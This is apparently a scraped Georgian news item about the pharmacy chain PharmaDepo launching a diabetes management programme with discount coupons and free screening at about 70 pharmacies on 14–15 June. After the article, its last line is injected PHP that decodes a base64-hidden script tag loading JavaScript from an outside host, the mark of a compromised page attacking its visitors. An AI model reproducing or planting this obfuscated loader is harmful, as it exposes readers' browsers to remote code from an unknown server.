celsiusi
ავერსი საქკაბელი
„ფარმადეპომ“ მომხმარებლებისთვის ე.წ დიაბეტის მართვის პროგრამა შექმნა. ამის შესახებ საინფორმაციო სააგენტო BUSINESS TIME-ს კომპანიიდან აცნობეს.
 
როგორც „ფარმადეპო“–ში განგვიცხადეს, აღნიშნული პროგრამა კომპლექსურია და აერთიანებს ბევრ მიმართულებას. 
 
14–15 ივნისს, „ფარმადეპო“–ს 70–მდე აფთიაქში მომხმარებლებს შეეძლებათ, ისარგებლონ უფასო სკრინინგით. ასევე, მიიღონ საჩუქრები და აქციების სპეციალური შეთავაზებები.   
 
„ფარმადეპომ“ შეიმუშავა დიაბეტის მართვის სპეციალური პროგრამა, რომელიც საშუალებას გვაძლევს, რომ დიაბეტის პრობლემების მქონე ადამიანების მიმართ, გამოვიჩინოთ დამატებითი ფარმაცევტული ზრუნვა. ეს არის კომპლექსური პროგრამა და ბევრ მიმართულებას აერთიანებს საკუთარ თავში, მაგალითად, მინდა გამოვყო ბუკლეტი, რომელიც მოიცავს სპეციალურ ფასდაკლების კუპონს, რომელიც გათვლილია იმ პროდუქციაზე რაც დიაბეტის მქონე ადამიანებს ჭირდებათ, ამასთან ბუკლეტის საშუალებით მომხმარებლებს შეეძლებათ აკონტროლონ შაქრის მოცულობა ორგანიზმში სპეციალური ცხრილის მეშვეობით. ფასდაკლება თვის დასაწყისში იწყება, თვის ბოლომდე აქვს ვადა და უნდა გაითვალისწინოს მომხმარებელმა, რომ ეს ფასდაკლება ერთჯერადია. ასევე რაც მთავარია, 14–15 ივნისს, „ფარმადეპო“–ს 70–მდე აფთიაქში მომხმარებლებს შეეძლებათ, ისარგებლონ უფასო სკრინინგით. გარდა ამისა დღეს და ხვალ მომმარებლებს ექნებათ, სპეციალური ფასდაკლებები და შეთავაზებები, ასევე გრძელდება ბეჭდების აქციაც. – განაცხადა „ფარმადეპოს“ ქსელის ხელმძღვანელმა ქეთი კოზმანაშვილმა. 
 
 
 
1054
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");